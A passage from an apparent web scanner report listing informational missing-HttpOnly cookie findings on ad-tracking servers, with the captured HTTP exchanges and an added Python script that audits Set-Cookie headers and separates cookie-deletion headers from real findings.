Set-Cookie: bh="b!!!!V!!-O3!!!!#=3G@^!!Os7!!!!#=3G@^!!`4x!!!!$=3Ef#!!jBx!!!!#=2srH!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#0Db!!!!#=3*$x!#2Rm!!!!#=3*$x!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8TD!!!!#=3*$x!#N[5!!!!#=3!ea!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!#=3G@^!#bw^!!!!#=3G@^!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!$=3GDG!#v-#!!!!#=3*$x!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!#=3G@^!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$,jv!!!!#=3!ea!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$1:.!!!!#=3!ea!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3y-!!!!'=2v<]!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$<DI!!!!#=3G@^"; path=/; expires=Tue, 03-Sep-2013 00:47:35 GMT
Cache-Control: no-store
Last-Modified: Sun, 04 Sep 2011 00:47:35 GMT
Pragma: no-cache
Content-Length: 43
Content-Type: image/gif
Age: 0
Proxy-Connection: close

GIF89a.............!.......,...........D..;

12.28. http://adadvisor.net/adscores/g.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adadvisor.net
Path:   /adscores/g.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /adscores/g.js?sid=9201023828 HTTP/1.1
Host: adadvisor.net
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2925993182975414771&mktid=27&mpid=3808468&fpid=-1&rnd=7044539534532983673&nu=n&sp=n&ctid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:48:08 GMT
Connection: close
Server: AAWebServer
P3P: policyref="http://www.adadvisor.net/w3c/p3p.xml",CP="NOI NID"
Content-Length: 21
Content-Type: application/javascript
Set-Cookie: ab=0001%3AR2FJHgNFRQ4Qt9W2tXVkxDaOpLVexjtt; Domain=.adadvisor.net; Expires=Sun, 04 Sep 2012 00:48:08 GMT; Path=/

document.write( '' );

12.29. http://ads.adbrite.com/adserver/vdi/742697

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/742697

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: vsd and rb2 (Domain=.adbrite.com). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function. Both headers also omit the Secure flag; note that vsd carries the referring host (cdn.turn.com) in clear text and rb2 is a base64-encoded blob that embeds the same uid value sent in the request, so both are tracking state rather than authentication material.

Request

GET /adserver/vdi/742697?d=2925993182975414771 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2925993182975414771&mktid=27&mpid=3808468&fpid=-1&rnd=7044539534532983673&nu=n&sp=n&ctid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168296542x0.096+1314892454x-365710891"; rb2=EAE; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUirOLM3IrzEsr0xMN6sxqjEsyShW0lFKSszLSy3KBKtQqq0FAA%3D%3D"; vsd=0@1@4e60f636@www.garage4hackers.com

Response

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Sun, 04 Sep 2011 00:57:21 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: vsd=0@2@4e62ccf1@cdn.turn.com; path=/; domain=.adbrite.com; expires=Tue, 06-Sep-2011 00:57:21 GMT
Set-Cookie: rb2=CiMKBjc0MjY5NxjDupW2NCITMjkyNTk5MzE4Mjk3NTQxNDc3MRAB; path=/; domain=.adbrite.com; expires=Sat, 03-Dec-2011 00:57:21 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;

12.30. http://ads.revsci.net/adserver/ako

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: rsi_us_1000000 and the rsiPus_* cookies (Domain=.revsci.net). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function. Every Set-Cookie header shown in this response carries an empty value and an Expires date of 01-Jan-1970, once under Path=/adserver and once under Path=/: the server is clearing these cookies, not issuing them, so the missing flag has no practical effect here and the finding is scanner noise triggered by deletion headers.
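
The three findings in this section report the same attribute gap, and the scanner wording is identical for the revsci.net response even though its Set-Cookie headers carry empty values and 1970 expiry dates. The check below is an added example, not code from this report or from any of the servers listed: it parses raw Set-Cookie lines, lists the security attributes each cookie lacks (HttpOnly, Secure, SameSite), and marks deletion headers so a reviewer can separate real exposure from noise. The sample input is three header lines copied from the responses in this section plus one hardened `sid` cookie on example.test that is an assumption; REPORT_TIME is fixed to the revsci.net response Date so the result is reproducible.

```python
"""Audit Set-Cookie headers for missing HttpOnly/Secure/SameSite attributes.

Added example for this section of the report; it is not the scanner's own
code. It parses raw Set-Cookie lines, lists the attributes each cookie
lacks, and separates real issuance from deletion headers (empty value,
Max-Age <= 0, or an Expires date in the past), which a flag-only check
reports exactly like a freshly issued cookie.
"""
from dataclasses import dataclass
from datetime import datetime, timezone

# Reference clock: the Date header of the revsci.net response in this section.
# Fixed (an assumption) so the deletion check is reproducible offline.
REPORT_TIME = datetime(2011, 9, 4, 0, 57, 21, tzinfo=timezone.utc)

# The two Expires layouts that appear in the headers of this report
# (RFC 1123 and the older hyphenated Netscape form).
COOKIE_DATE_FORMATS = (
    "%a, %d %b %Y %H:%M:%S GMT",
    "%a, %d-%b-%Y %H:%M:%S GMT",
)

# Constructed sample: three lines copied from the responses in this section,
# plus a hardened cookie that is an assumption (no server here sent it).
SAMPLE_HEADERS = [
    "Set-Cookie: ab=0001%3AR2FJHgNFRQ4Qt9W2tXVkxDaOpLVexjtt; Domain=.adadvisor.net; Expires=Sun, 04 Sep 2012 00:48:08 GMT; Path=/",
    "Set-Cookie: vsd=0@2@4e62ccf1@cdn.turn.com; path=/; domain=.adbrite.com; expires=Tue, 06-Sep-2011 00:57:21 GMT",
    'Set-Cookie: rsiPus_NETa=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver',
    "Set-Cookie: sid=d41d8cd98f00b204; Domain=example.test; Path=/; Secure; HttpOnly; SameSite=Lax",
]


@dataclass
class CookieFinding:
    name: str
    domain: str
    missing: tuple      # security attributes absent from the header
    deletion: bool      # True when the header clears the cookie instead of issuing it


def parse_cookie_date(text):
    """Parse an Expires value; return None when the layout is unknown."""
    for fmt in COOKIE_DATE_FORMATS:
        try:
            return datetime.strptime(text.strip(), fmt).replace(tzinfo=timezone.utc)
        except ValueError:
            continue
    return None


def parse_set_cookie(header):
    """Split one Set-Cookie line into (name, value, {attr_lower: value})."""
    body = header.split(":", 1)[1] if header.lower().startswith("set-cookie:") else header
    pair, *attr_parts = [p.strip() for p in body.split(";")]
    name, _, value = pair.partition("=")
    if len(value) >= 2 and value[0] == value[-1] == '"':
        value = value[1:-1]          # RFC 6265 permits a DQUOTE-wrapped value
    attrs = {}
    for part in attr_parts:
        if not part:
            continue
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip()   # bare flags map to ""
    return name.strip(), value, attrs


def is_deletion(value, attrs, now):
    """True when the header clears the cookie: empty value, Max-Age <= 0,
    or an Expires date at or before `now`."""
    if value == "":
        return True
    if "max-age" in attrs:
        try:
            if int(attrs["max-age"]) <= 0:
                return True
        except ValueError:
            pass
    expires = parse_cookie_date(attrs["expires"]) if "expires" in attrs else None
    return expires is not None and expires <= now


def audit_set_cookie_headers(headers, now=REPORT_TIME):
    """Return one CookieFinding per header, in input order."""
    checks = (("HttpOnly", "httponly"), ("Secure", "secure"), ("SameSite", "samesite"))
    findings = []
    for header in headers:
        name, value, attrs = parse_set_cookie(header)
        missing = tuple(label for label, key in checks if key not in attrs)
        findings.append(CookieFinding(
            name=name,
            domain=attrs.get("domain", ""),
            missing=missing,
            deletion=is_deletion(value, attrs, now),
        ))
    return findings


if __name__ == "__main__":
    for f in audit_set_cookie_headers(SAMPLE_HEADERS):
        state = "deletion" if f.deletion else "issued"
        print(f"{f.name:14s} {f.domain:16s} {state:9s} missing={', '.join(f.missing) or 'none'}")
```

Run against the sample, only ab and vsd come out as issued cookies with missing attributes; rsiPus_NETa is classified as a deletion and the hardened sid cookie reports nothing missing. Filtering on `f.missing and not f.deletion` is the triage step that removes the hundreds of rsiPus_* deletion headers from a report like this one while keeping the two genuine findings.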

Request

GET /adserver/ako?activate&csid=I07714 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=c84fd631153807952fe54cd0e5ae7570; NETSEGS_J06575=52e7dd6cb6c0ef21&J06575&0&4e87b369&0&&4e61a9e1&68d836b0a1fd7963e56f000759258b9c; NETSEGS_I07714=52e7dd6cb6c0ef21&I07714&0&4e87b3cb&0&&4e619905&68d836b0a1fd7963e56f000759258b9c; rtc_o6zg=MLsvsLFOMQ5vJpHEvNGJwe3bNDdPqDE7tney9j8XHZxVnCKr9EgfSAe8w4hAY+1S3GROT8pMx0Dk4VfWE4HqpYJRGPSKk1HuHKzz4/0koCkSq5JBQoSmi7zZNoJT0NEAALAtP6fzvZAWXZ+loThQ0WihkO+/o6mSdVwKrgqt65uVFEp8XI4N3ZpjmWzsphrfMQP8kY5P/8jQTq0b7REA668mU80lpsjMzKwzFbryqD4V41L+z9JHKh4rhVL47OYEWipj787OGH+L5uaHYXYNbKq2OBL8iIXHGM+Swv9IOQ5FriyvLu/Z2CaUGb3SZd2dky0d4PEM7QQNkWvbJUUcJPbvZf20Hhlhq8CwdVhIbBVx3SiCZYBPlHik9o2CQ9gk9RT6MakYoJ+gbc9aoDyd41769iZf5VrCQMs1k0du/3q50I3PWYMPgxVJ3cffzI135Z/BwA==; rsiPus_NETa="MLtXrkMudi5rIAH3UpwEJpB/RQj/qbmQuWN+RCv7T+OLIs2UoOzw2R6OZozbaj0NZZ45MlkNtMqPVOptzqkKdvD18Zfp9zyM+idE6DRdxshTuowPXaRbsxgmifn/wvKgJ9/VnhrJzKeMgZVTq8IsQARrHBkYIrXxPiLXc3N22revbL0v4m855Eayu7V5ibT1fXUEnuBnm64+IogRugWmliBFss+7oKy0C4/dn2rLIYYUbVP6peeBE3GASWSkD0HguCRTCOCL7EINF3DBxBW7lINJFnudhYTenjgNbTyOJHnaBHD5RLX0Oho8ilqNaKYacw/RPC0="; rsi_us_1000000="[value elided]"; rsi_segs_1000000=pUPFecPC7nMQFmLKHV0ITey31RIQwTkWYA7XBUxrAAZisncWnsac5BtpDFUZr6/jfEWlBmKgLSikWJN5CeVI20Xbp+vrNYD6PVldZSUAgu3S7s1bxWP/7kn26cuKgi1K+/Ydf4oafy+ypzYpgeCjqXgiKj8gNT0QkV6VtDzz1yGkT0ImNiyCYCLyTW6llvuj6rbhnFE+nvecITNA4NoSYcIBDuAmpXDMUXN6FvJVluGCUB+a; udm_0=[value elided]

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_NETa=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_SQhO=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_p40C=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_ymv_=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_yjA-=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_jxhu=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_vWHn=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_IhUn=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_VkyB=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_kT-f=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_6E4b=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_5ibF=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_QSMB=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_7GZu=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Ykjc=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_B74h=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_VVZs=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_ZxL8=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_p52T=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_LU5v=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_uqCf=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_9hMX=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_hufe=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_XwOO=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_DQmF=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_E_kE=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_t2Ci=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_ruoh=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_eGsw=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_cly0=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_38vw=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_TJin=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_iScD=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_3v-F=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_JQpk=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_l5FR=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Wu51=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_bmoM=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_HmBn=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_8At2=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_-43F=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_ZQ2V=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_X7VX=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_O93y=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_semT=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_qPtn=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_lHfg=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_tnTy=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_cCPz=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_uI4c=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_2KsA=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_reJm=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_tv4w=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_A8W5=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_oGKA=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_cy6Z=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_ZrA0=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_L8i2=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Sa36=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_FrsI=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_zESt=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Ym1n=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_pUuq=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_uwnv=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus__2mg=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_EZsx=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_ZZ0H=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_BNSC=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_tax2=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_xyGv=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_yfbI=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_sG0W=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_4VQP=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_ExVS=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_cgR7=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_wtrl=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_o9vY=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_xmhv=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_qM8j=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_waet=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_RBpd=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_mILT=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus__nAQ=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_VsZJ=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_xqRq=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_GHGt=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_DSfE=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_tlyw=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_8Xg2=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_J61O=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_hhbJ=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_pHL8=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_XsfT=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_eQFb=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_qJz5=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_E85s=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_5Ucm=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_v_f5=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_bDDn=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_rNcS=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_5TRc=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_l2Kn=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_sZLs=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_qEBt=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_GPFg=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_HG8X=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_AMrT=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_L9DA=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_1djr=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_R2Sk=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_tqia=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_W0Nw=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_wjT0=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_OVF5=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_xj6q=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Tn_F=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Xy4W=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_7q1i=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_3mus=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_9AUr=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
